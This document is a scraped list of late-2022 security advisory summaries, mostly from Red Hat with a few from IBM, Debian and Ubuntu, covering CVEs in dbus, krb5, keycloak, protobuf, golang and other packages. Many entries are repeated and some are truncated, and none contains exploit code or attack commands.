An update for dbus is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-42010: dbus: dbus-daemon crashes when receiving message with incorrectly nested parentheses and curly brackets * CVE-2022-42011: dbus: dbus-daemon can be crashed by messages with array length inconsistent with element type * CVE-2022-42012: dbus: `_dbus_marshal_byteswap` doesn't process fds in messages with "foreign" endianness co...

RHSA-2022:8977: Red Hat Security Advisory: dbus security update

An update for dbus is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-42010: dbus: dbus-daemon crashes when receiving message with incorrectly nested parentheses and curly brackets * CVE-2022-42011: dbus: dbus-daemon can be crashed by messages with array length inconsistent with element type * CVE-2022-42012: dbus: `_dbus_marshal_byteswap` doesn't process fds in messages with "foreign" endianness co...

RHSA-2022:8977: Red Hat Security Advisory: dbus security update

An update for dbus is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-42010: dbus: dbus-daemon crashes when receiving message with incorrectly nested parentheses and curly brackets * CVE-2022-42011: dbus: dbus-daemon can be crashed by messages with array length inconsistent with element type * CVE-2022-42012: dbus: `_dbus_marshal_byteswap` doesn't process fds in messages with "foreign" endianness co...

RHSA-2022:8964: Red Hat Security Advisory: updated rh-sso-7/sso76-openshift-rhel8 container and operator related images

Updated rh-sso-7/sso76-openshift-rhel8 container image and rh-sso-7/sso7-rhel8-operator-bundle image is now available for RHEL-8 based Middleware Containers. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-3782: keycloak: path traversal via double URL encoding * CVE-2022-3916: keycloak: Session takeover with OIDC offline refreshtokens

CVE-2022-41296: Multiple vulnerabilities affect IBM Db2® on Cloud Pak for Data and Db2 Warehouse® on Cloud Pak for Data

IBM Db2U 3.5, 4.0, and 4.5 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 237210.

CVE-2022-41296: Multiple vulnerabilities affect IBM Db2® on Cloud Pak for Data and Db2 Warehouse® on Cloud Pak for Data

IBM Db2U 3.5, 4.0, and 4.5 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 237210.

CVE-2022-3259: Invalid Bug ID

Openshift 4.9 does not use HTTP Strict Transport Security (HSTS) which may allow man-in-the-middle (MITM) attacks.

Red Hat Security Advisory 2022-8781-01

Red Hat Security Advisory 2022-8781-01 - Logging Subsystem for Red Hat OpenShift has a security update. Issues addressed include a denial of service vulnerability.

Red Hat Security Advisory 2022-8781-01

Red Hat Security Advisory 2022-8781-01 - Logging Subsystem for Red Hat OpenShift has a security update. Issues addressed include a denial of service vulnerability.

Red Hat Security Advisory 2022-8781-01

Red Hat Security Advisory 2022-8781-01 - Logging Subsystem for Red Hat OpenShift has a security update. Issues addressed include a denial of service vulnerability.

Red Hat Security Advisory 2022-8847-01

Red Hat Security Advisory 2022-8847-01 - An update for protobuf is now available for Red Hat OpenStack Platform 16.2.4 (Train).

Red Hat Security Advisory 2022-8863-01

Red Hat Security Advisory 2022-8863-01 - Paramiko is a module for python 2.3 or greater that implements the SSH2 protocol for secure connections to remote machines. Unlike SSL, the SSH2 protocol does not require heirarchical certificates signed by a powerful central authority. You may know SSH2 as the protocol that replaced telnet and rsh for secure access to remote shells, but the protocol also includes the ability to open arbitrary channels to remote services across an encrypted tunnel.

RHSA-2022:8781: Red Hat Security Advisory: Logging Subsystem 5.5.5 - Red Hat OpenShift security update

Logging Subsystem 5.5.5 - Red Hat OpenShift Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2020-36518: jackson-databind: denial of service via a large depth of nested objects * CVE-2022-2879: golang: archive/tar: unbounded memory consumption when reading headers * CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters * CVE-2022-27664: golang: net/http: handle server errors after sending GOAWAY * CVE-2022-32189: golang: math/b...

RHSA-2022:8781: Red Hat Security Advisory: Logging Subsystem 5.5.5 - Red Hat OpenShift security update

Logging Subsystem 5.5.5 - Red Hat OpenShift Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2020-36518: jackson-databind: denial of service via a large depth of nested objects * CVE-2022-2879: golang: archive/tar: unbounded memory consumption when reading headers * CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters * CVE-2022-27664: golang: net/http: handle server errors after sending GOAWAY * CVE-2022-32189: golang: math/b...

RHSA-2022:8781: Red Hat Security Advisory: Logging Subsystem 5.5.5 - Red Hat OpenShift security update

Logging Subsystem 5.5.5 - Red Hat OpenShift Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2020-36518: jackson-databind: denial of service via a large depth of nested objects * CVE-2022-2879: golang: archive/tar: unbounded memory consumption when reading headers * CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters * CVE-2022-27664: golang: net/http: handle server errors after sending GOAWAY * CVE-2022-32189: golang: math/b...

RHSA-2022:8863: Red Hat Security Advisory: Red Hat OpenStack Platform 16.1.9 (python-paramiko) security update

An update for python-paramiko is now available for Red Hat OpenStack Platform 16.1.9 (Train). Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-24302: python-paramiko: Race condition in the write_private_key_file function

RHSA-2022:8847: Red Hat Security Advisory: Red Hat OpenStack Platform 16.2.4 (protobuf) security update

An update for protobuf is now available for Red Hat OpenStack Platform 16.2.4 (Train). Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-22570: protobuf: Incorrect parsing of nullchar in the proto symbol leads to Nullptr dereference

RHSA-2022:8845: Red Hat Security Advisory: Red Hat OpenStack Platform 16.2.4 (python-paramiko) security update

An update for python-paramiko is now available for Red Hat OpenStack Platform 16.2.4 (Train). Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-24302: python-paramiko: Race condition in the write_private_key_file function

Red Hat Security Advisory 2022-8827-01

Red Hat Security Advisory 2022-8827-01 - Updated images are now available for Red Hat Advanced Cluster Security (RHACS). The updated image includes new features and bug fixes.

Red Hat Security Advisory 2022-8812-01

Red Hat Security Advisory 2022-8812-01 - D-Bus is a system for sending messages between applications. It is used both for the system-wide message bus service, and as a per-user-login-session messaging facility.

Red Hat Security Advisory 2022-8812-01

Red Hat Security Advisory 2022-8812-01 - D-Bus is a system for sending messages between applications. It is used both for the system-wide message bus service, and as a per-user-login-session messaging facility.

Red Hat Security Advisory 2022-8812-01

Red Hat Security Advisory 2022-8812-01 - D-Bus is a system for sending messages between applications. It is used both for the system-wide message bus service, and as a per-user-login-session messaging facility.

RHSA-2022:8812: Red Hat Security Advisory: dbus security update

An update for dbus is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-42010: dbus: dbus-daemon crashes when receiving message with incorrectly nested parentheses and curly brackets * CVE-2022-42011: dbus: dbus-daemon can be crashed by messages with array length inconsistent with element type * CVE-2022-42012: dbus: `_dbus_marshal_byteswap` doesn't process fds in messages with "foreign" endianness co...

RHSA-2022:8812: Red Hat Security Advisory: dbus security update

An update for dbus is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-42010: dbus: dbus-daemon crashes when receiving message with incorrectly nested parentheses and curly brackets * CVE-2022-42011: dbus: dbus-daemon can be crashed by messages with array length inconsistent with element type * CVE-2022-42012: dbus: `_dbus_marshal_byteswap` doesn't process fds in messages with "foreign" endianness co...

RHSA-2022:8812: Red Hat Security Advisory: dbus security update

An update for dbus is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-42010: dbus: dbus-daemon crashes when receiving message with incorrectly nested parentheses and curly brackets * CVE-2022-42011: dbus: dbus-daemon can be crashed by messages with array length inconsistent with element type * CVE-2022-42012: dbus: `_dbus_marshal_byteswap` doesn't process fds in messages with "foreign" endianness co...

Red Hat Security Advisory 2022-8750-01

Red Hat Security Advisory 2022-8750-01 - OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. Issues addressed include denial of service and out of bounds read vulnerabilities.

Red Hat Security Advisory 2022-8626-01

Red Hat Security Advisory 2022-8626-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.11.17. Issues addressed include a denial of service vulnerability.

Red Hat Security Advisory 2022-8626-01

Red Hat Security Advisory 2022-8626-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.11.17. Issues addressed include a denial of service vulnerability.

RHSA-2022:8669: Red Hat Security Advisory: krb5 security update

An update for krb5 is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-42898: krb5: integer overflow vulnerabilities in PAC parsing

RHSA-2022:8662: Red Hat Security Advisory: krb5 security update

An update for krb5 is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-42898: krb5: integer overflow vulnerabilities in PAC parsing

RHSA-2022:8626: Red Hat Security Advisory: OpenShift Container Platform 4.11.17 packages and security update

Red Hat OpenShift Container Platform release 4.11.17 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.11. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-27664: golang: net/http: handle server errors after sending GOAWAY * CVE-2022-32148: golang: net/http/ht...

Red Hat Security Advisory 2022-8648-01

Red Hat Security Advisory 2022-8648-01 - Kerberos is a network authentication system, which can improve the security of your network by eliminating the insecure practice of sending passwords over the network in unencrypted form. It allows clients and servers to authenticate to each other with the help of a trusted third party, the Kerberos key distribution center. Issues addressed include an integer overflow vulnerability.

Red Hat Security Advisory 2022-8634-01

Red Hat Security Advisory 2022-8634-01 - OpenShift API for Data Protection enables you to back up and restore application resources, persistent volume data, and internal container images to external backup storage. OADP enables both file system-based and snapshot-based backups for persistent volumes.

Red Hat Security Advisory 2022-8641-01

Red Hat Security Advisory 2022-8641-01 - Kerberos is a network authentication system, which can improve the security of your network by eliminating the insecure practice of sending passwords over the network in unencrypted form. It allows clients and servers to authenticate to each other with the help of a trusted third party, the Kerberos key distribution center. Issues addressed include an integer overflow vulnerability.

Red Hat Security Advisory 2022-8637-01

Red Hat Security Advisory 2022-8637-01 - Kerberos is a network authentication system, which can improve the security of your network by eliminating the insecure practice of sending passwords over the network in unencrypted form. It allows clients and servers to authenticate to each other with the help of a trusted third party, the Kerberos key distribution center. Issues addressed include an integer overflow vulnerability.

RHSA-2022:8639: Red Hat Security Advisory: krb5 security update

An update for krb5 is now available for Red Hat Enterprise Linux 8.4 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-42898: krb5: integer overflow vulnerabilities in PAC parsing

RHSA-2022:8634: Red Hat Security Advisory: OpenShift API for Data Protection (OADP) 1.1.1 security and bug fix update

OpenShift API for Data Protection (OADP) 1.1.1 is now available. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-27191: golang: crash in a golang.org/x/crypto/ssh server * CVE-2022-27664: golang: net/http: handle server errors after sending GOAWAY * CVE-2022-30632: golang: path/filepath: stack exhaustion in Glob * CVE-2022-30635: golang: encoding/gob: stack exhaustion in Decoder.Decode * CVE-2022-32190: golang: net/url: JoinPath does not strip relative path components i...

RHSA-2022:8634: Red Hat Security Advisory: OpenShift API for Data Protection (OADP) 1.1.1 security and bug fix update

OpenShift API for Data Protection (OADP) 1.1.1 is now available. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-27191: golang: crash in a golang.org/x/crypto/ssh server * CVE-2022-27664: golang: net/http: handle server errors after sending GOAWAY * CVE-2022-30632: golang: path/filepath: stack exhaustion in Glob * CVE-2022-30635: golang: encoding/gob: stack exhaustion in Decoder.Decode * CVE-2022-32190: golang: net/url: JoinPath does not strip relative path components i...

Red Hat Security Advisory 2022-8535-01

Red Hat Security Advisory 2022-8535-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.16. Issues addressed include a denial of service vulnerability.

Red Hat Security Advisory 2022-8535-01

Red Hat Security Advisory 2022-8535-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.16. Issues addressed include a denial of service vulnerability.

RHSA-2022:8534: Red Hat Security Advisory: OpenShift Container Platform 4.11.16 security update

Red Hat OpenShift Container Platform release 4.11.16 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.11. Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-32189: golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service

Debian Security Advisory 5286-1

Debian Linux Security Advisory 5286-1 - Greg Hudson discovered integer overflow flaws in the PAC parsing in krb5, the MIT implementation of Kerberos, which may result in remote code execution (in a KDC, kadmin, or GSS or Kerberos application server process), information exposure (to a cross-realm KDC acting maliciously), or denial of service (KDC or kadmind process crash).

Red Hat Security Advisory 2022-8250-01

Red Hat Security Advisory 2022-8250-01 - The Grafana plugin for Performance Co-Pilot includes datasources for scalable time series from pmseries and Redis, live PCP metrics and bpftrace scripts from pmdabpftrace, as well as several dashboards.

Red Hat Security Advisory 2022-8250-01

Red Hat Security Advisory 2022-8250-01 - The Grafana plugin for Performance Co-Pilot includes datasources for scalable time series from pmseries and Redis, live PCP metrics and bpftrace scripts from pmdabpftrace, as well as several dashboards.

Red Hat Security Advisory 2022-8250-01

Red Hat Security Advisory 2022-8250-01 - The Grafana plugin for Performance Co-Pilot includes datasources for scalable time series from pmseries and Redis, live PCP metrics and bpftrace scripts from pmdabpftrace, as well as several dashboards.

Red Hat Security Advisory 2022-8008-01

Red Hat Security Advisory 2022-8008-01 - The buildah package provides a tool for facilitating building OCI container images. Among other things, buildah enables you to: Create a working container, either from scratch or using an image as a starting point; Create an image, either from a working container or using the instructions in a Dockerfile; Build both Docker and OCI images. Issues addressed include denial of service and information leakage vulnerabilities.

Red Hat Security Advisory 2022-8098-01

Red Hat Security Advisory 2022-8098-01 - Toolbox is a tool for Linux operating systems, which allows the use of containerized command line environments. It is built on top of Podman and other standard container technologies from OCI.

Red Hat Security Advisory 2022-8098-01

Red Hat Security Advisory 2022-8098-01 - Toolbox is a tool for Linux operating systems, which allows the use of containerized command line environments. It is built on top of Podman and other standard container technologies from OCI.

Red Hat Security Advisory 2022-7970-01

Red Hat Security Advisory 2022-7970-01 - The protobuf packages provide Protocol Buffers, Google's data interchange format. Protocol Buffers can encode structured data in an efficient yet extensible format, and provide a flexible, efficient, and automated mechanism for serializing structured data.

Red Hat Security Advisory 2022-8057-01

Red Hat Security Advisory 2022-8057-01 - Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB. Issues addressed include cross site request forgery, cross site scripting, denial of service, information leakage, and privilege escalation vulnerabilities.

Red Hat Security Advisory 2022-8057-01

Red Hat Security Advisory 2022-8057-01 - Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB. Issues addressed include cross site request forgery, cross site scripting, denial of service, information leakage, and privilege escalation vulnerabilities.

Red Hat Security Advisory 2022-8057-01

Red Hat Security Advisory 2022-8057-01 - Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB. Issues addressed include cross site request forgery, cross site scripting, denial of service, information leakage, and privilege escalation vulnerabilities.

Red Hat Security Advisory 2022-8057-01

Red Hat Security Advisory 2022-8057-01 - Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB. Issues addressed include cross site request forgery, cross site scripting, denial of service, information leakage, and privilege escalation vulnerabilities.

RHSA-2022:8250: Red Hat Security Advisory: grafana-pcp security update

An update for grafana-pcp is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-30630: golang: io/fs: stack exhaustion in Glob * CVE-2022-30631: golang: compress/gzip: stack exhaustion in Reader.Read * CVE-2022-30632: golang: path/filepath: stack exhaustion in Glob * CVE-2022-30635: golang: encoding/gob: stack exhaustion in Decoder.Decode * CVE...

RHSA-2022:8250: Red Hat Security Advisory: grafana-pcp security update

An update for grafana-pcp is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-30630: golang: io/fs: stack exhaustion in Glob * CVE-2022-30631: golang: compress/gzip: stack exhaustion in Reader.Read * CVE-2022-30632: golang: path/filepath: stack exhaustion in Glob * CVE-2022-30635: golang: encoding/gob: stack exhaustion in Decoder.Decode * CVE...

RHSA-2022:8250: Red Hat Security Advisory: grafana-pcp security update

An update for grafana-pcp is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-30630: golang: io/fs: stack exhaustion in Glob * CVE-2022-30631: golang: compress/gzip: stack exhaustion in Reader.Read * CVE-2022-30632: golang: path/filepath: stack exhaustion in Glob * CVE-2022-30635: golang: encoding/gob: stack exhaustion in Decoder.Decode * CVE...

RHSA-2022:8008: Red Hat Security Advisory: buildah security and bug fix update

An update for buildah is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-20291: containers/storage: DoS via malicious image * CVE-2021-33195: golang: net: lookup functions may return invalid host names * CVE-2021-33197: golang: net/http/httputil: ReverseProxy forwards connection headers if first one is empty * CVE-2021-33198: golang: math/big.Rat: may cause a panic or an unrecoverable fatal error if passed inputs with very l...

RHSA-2022:7950: Red Hat Security Advisory: Image Builder security, bug fix, and enhancement update

An update for cockpit-composer, osbuild, osbuild-composer, and weldr-client is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-32189: golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service

RHSA-2022:7970: Red Hat Security Advisory: protobuf security update

An update for protobuf is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-22570: protobuf: Incorrect parsing of nullchar in the proto symbol leads to Nullptr dereference

Red Hat Security Advisory 2022-7464-01

Red Hat Security Advisory 2022-7464-01 - The protobuf packages provide Protocol Buffers, Google's data interchange format. Protocol Buffers can encode structured data in an efficient yet extensible format, and provide a flexible, efficient, and automated mechanism for serializing structured data.

RHSA-2022:7464: Red Hat Security Advisory: protobuf security update

An update for protobuf is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-22570: protobuf: Incorrect parsing of nullchar in the proto symbol leads to Nullptr dereference

RHSA-2022:7529: Red Hat Security Advisory: container-tools:3.0 security update

An update for the container-tools:3.0 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-1708: cri-o: memory exhaustion on the node when access to the kube api * CVE-2022-1962: golang: go/parser: stack exhaustion in all Parse* functions * CVE-2022-21698: prometheus/client_golang: Denial of service using InstrumentHandlerCounter * CVE-...

RHSA-2022:7457: Red Hat Security Advisory: container-tools:rhel8 security, bug fix, and enhancement update

An update for the container-tools:rhel8 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-36221: golang: net/http/httputil: panic due to racy read of persistConn after handler panic * CVE-2021-41190: opencontainers: OCI manifest and index parsing confusion * CVE-2022-1708: cri-o: memory exhaustion on the node when access to the kube api * CVE-2022-2990: buildah: possible information disclosure and modification * CVE-...

Ubuntu Security Notice USN-5704-1

Ubuntu Security Notice 5704-1 - It was discovered that DBus incorrectly handled messages with invalid type signatures. A local attacker could possibly use this issue to cause DBus to crash, resulting in a denial of service. It was discovered that DBus was incorrectly validating the length of arrays of fixed-length items. A local attacker could possibly use this issue to cause DBus to crash, resulting in a denial of service. It was discovered that DBus incorrectly handled the body DBus message with attached file descriptors. A local attacker could possibly use this issue to cause DBus to crash, resulting in a denial of service.

Ubuntu Security Notice USN-5704-1

